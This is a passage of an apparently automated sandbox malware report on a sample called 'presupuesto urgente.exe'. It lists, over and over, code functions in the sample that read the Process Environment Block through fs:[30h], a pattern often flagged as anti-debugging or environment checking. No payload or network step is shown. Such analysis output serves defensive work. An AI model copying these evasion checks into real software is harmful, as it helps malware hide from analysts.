        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33552755 mov eax, dword ptr fs:[00000030h]2_2_33552755
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356A750 mov eax, dword ptr fs:[00000030h]2_2_3356A750
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F75B mov eax, dword ptr fs:[00000030h]2_2_3352F75B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DE750 mov eax, dword ptr fs:[00000030h]2_2_335DE750
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33563740 mov eax, dword ptr fs:[00000030h]2_2_33563740
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356174A mov eax, dword ptr fs:[00000030h]2_2_3356174A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560774 mov eax, dword ptr fs:[00000030h]2_2_33560774
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534779 mov eax, dword ptr fs:[00000030h]2_2_33534779
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33534779 mov eax, dword ptr fs:[00000030h]2_2_33534779
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33542760 mov ecx, dword ptr fs:[00000030h]2_2_33542760
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353471B mov eax, dword ptr fs:[00000030h]2_2_3353471B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353471B mov eax, dword ptr fs:[00000030h]2_2_3353471B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF717 mov eax, dword ptr fs:[00000030h]2_2_335EF717
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353D700 mov ecx, dword ptr fs:[00000030h]2_2_3353D700
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F970B mov eax, dword ptr fs:[00000030h]2_2_335F970B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F970B mov eax, dword ptr fs:[00000030h]2_2_335F970B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33559723 mov eax, dword ptr fs:[00000030h]2_2_33559723
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF7CF mov eax, dword ptr fs:[00000030h]2_2_335EF7CF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335377F9 mov eax, dword ptr fs:[00000030h]2_2_335377F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335377F9 mov eax, dword ptr fs:[00000030h]2_2_335377F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E7E0 mov eax, dword ptr fs:[00000030h]2_2_3355E7E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33561796 mov eax, dword ptr fs:[00000030h]2_2_33561796
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33561796 mov eax, dword ptr fs:[00000030h]2_2_33561796
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336017BC mov eax, dword ptr fs:[00000030h]2_2_336017BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B781 mov eax, dword ptr fs:[00000030h]2_2_3360B781
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B781 mov eax, dword ptr fs:[00000030h]2_2_3360B781
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335307A7 mov eax, dword ptr fs:[00000030h]2_2_335307A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33565654 mov eax, dword ptr fs:[00000030h]2_2_33565654
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353965A mov eax, dword ptr fs:[00000030h]2_2_3353965A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353965A mov eax, dword ptr fs:[00000030h]2_2_3353965A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov eax, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov ecx, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov eax, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33533640 mov eax, dword ptr fs:[00000030h]2_2_33533640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C640 mov eax, dword ptr fs:[00000030h]2_2_3356C640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C640 mov eax, dword ptr fs:[00000030h]2_2_3356C640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D64A mov eax, dword ptr fs:[00000030h]2_2_3352D64A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D64A mov eax, dword ptr fs:[00000030h]2_2_3352D64A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33530670 mov eax, dword ptr fs:[00000030h]2_2_33530670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572670 mov eax, dword ptr fs:[00000030h]2_2_33572670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572670 mov eax, dword ptr fs:[00000030h]2_2_33572670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov esi, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov eax, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov eax, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D600 mov eax, dword ptr fs:[00000030h]2_2_3355D600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D600 mov eax, dword ptr fs:[00000030h]2_2_3355D600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF607 mov eax, dword ptr fs:[00000030h]2_2_335EF607
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356360F mov eax, dword ptr fs:[00000030h]2_2_3356360F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604600 mov eax, dword ptr fs:[00000030h]2_2_33604600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33530630 mov eax, dword ptr fs:[00000030h]2_2_33530630
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560630 mov eax, dword ptr fs:[00000030h]2_2_33560630
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov esi, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov eax, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov eax, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356F63F mov eax, dword ptr fs:[00000030h]2_2_3356F63F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356F63F mov eax, dword ptr fs:[00000030h]2_2_3356F63F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537623 mov eax, dword ptr fs:[00000030h]2_2_33537623
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov ecx, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov ecx, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov eax, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33535622 mov eax, dword ptr fs:[00000030h]2_2_33535622
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33535622 mov eax, dword ptr fs:[00000030h]2_2_33535622
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C620 mov eax, dword ptr fs:[00000030h]2_2_3356C620
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D6D0 mov eax, dword ptr fs:[00000030h]2_2_3355D6D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335306CF mov eax, dword ptr fs:[00000030h]2_2_335306CF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FA6C0 mov eax, dword ptr fs:[00000030h]2_2_335FA6C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335D86C2 mov eax, dword ptr fs:[00000030h]2_2_335D86C2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AC6F2 mov eax, dword ptr fs:[00000030h]2_2_335AC6F2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AC6F2 mov eax, dword ptr fs:[00000030h]2_2_335AC6F2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335296E0 mov eax, dword ptr fs:[00000030h]2_2_335296E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335296E0 mov eax, dword ptr fs:[00000030h]2_2_335296E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353C6E0 mov eax, dword ptr fs:[00000030h]2_2_3353C6E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335566E0 mov eax, dword ptr fs:[00000030h]2_2_335566E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335566E0 mov eax, dword ptr fs:[00000030h]2_2_335566E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33538690 mov eax, dword ptr fs:[00000030h]2_2_33538690
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AD69D mov eax, dword ptr fs:[00000030h]2_2_335AD69D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BC691 mov eax, dword ptr fs:[00000030h]2_2_335BC691
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF68C mov eax, dword ptr fs:[00000030h]2_2_335EF68C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F86A8 mov eax, dword ptr fs:[00000030h]2_2_335F86A8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F86A8 mov eax, dword ptr fs:[00000030h]2_2_335F86A8
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FA553 mov eax, dword ptr fs:[00000030h]2_2_335FA553
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354E547 mov eax, dword ptr fs:[00000030h]2_2_3354E547
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33566540 mov eax, dword ptr fs:[00000030h]2_2_33566540
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33568540 mov eax, dword ptr fs:[00000030h]2_2_33568540
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353254C mov eax, dword ptr fs:[00000030h]2_2_3353254C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354C560 mov eax, dword ptr fs:[00000030h]2_2_3354C560
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B55F mov eax, dword ptr fs:[00000030h]2_2_3360B55F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B55F mov eax, dword ptr fs:[00000030h]2_2_3360B55F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33551514 mov eax, dword ptr fs:[00000030h]2_2_33551514
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BC51D mov eax, dword ptr fs:[00000030h]2_2_335BC51D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov ecx, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov ecx, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DF51B mov eax, dword ptr fs:[00000030h]2_2_335DF51B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B502 mov eax, dword ptr fs:[00000030h]2_2_3352B502
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E507 mov eax, dword ptr fs:[00000030h]2_2_3355E507
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33532500 mov eax, dword ptr fs:[00000030h]2_2_33532500
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C50D mov eax, dword ptr fs:[00000030h]2_2_3356C50D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C50D mov eax, dword ptr fs:[00000030h]2_2_3356C50D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33533536 mov eax, dword ptr fs:[00000030h]2_2_33533536
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33533536 mov eax, dword ptr fs:[00000030h]2_2_33533536
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352753F mov eax, dword ptr fs:[00000030h]2_2_3352753F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352753F mov eax, dword ptr fs:[00000030h]2_2_3352753F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352753F mov eax, dword ptr fs:[00000030h]2_2_3352753F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572539 mov eax, dword ptr fs:[00000030h]2_2_33572539
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33561527 mov eax, dword ptr fs:[00000030h]2_2_33561527
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356F523 mov eax, dword ptr fs:[00000030h]2_2_3356F523
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354252B mov eax, dword ptr fs:[00000030h]2_2_3354252B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335665D0 mov eax, dword ptr fs:[00000030h]2_2_335665D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C5C6 mov eax, dword ptr fs:[00000030h]2_2_3356C5C6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F5C7 mov eax, dword ptr fs:[00000030h]2_2_3352F5C7
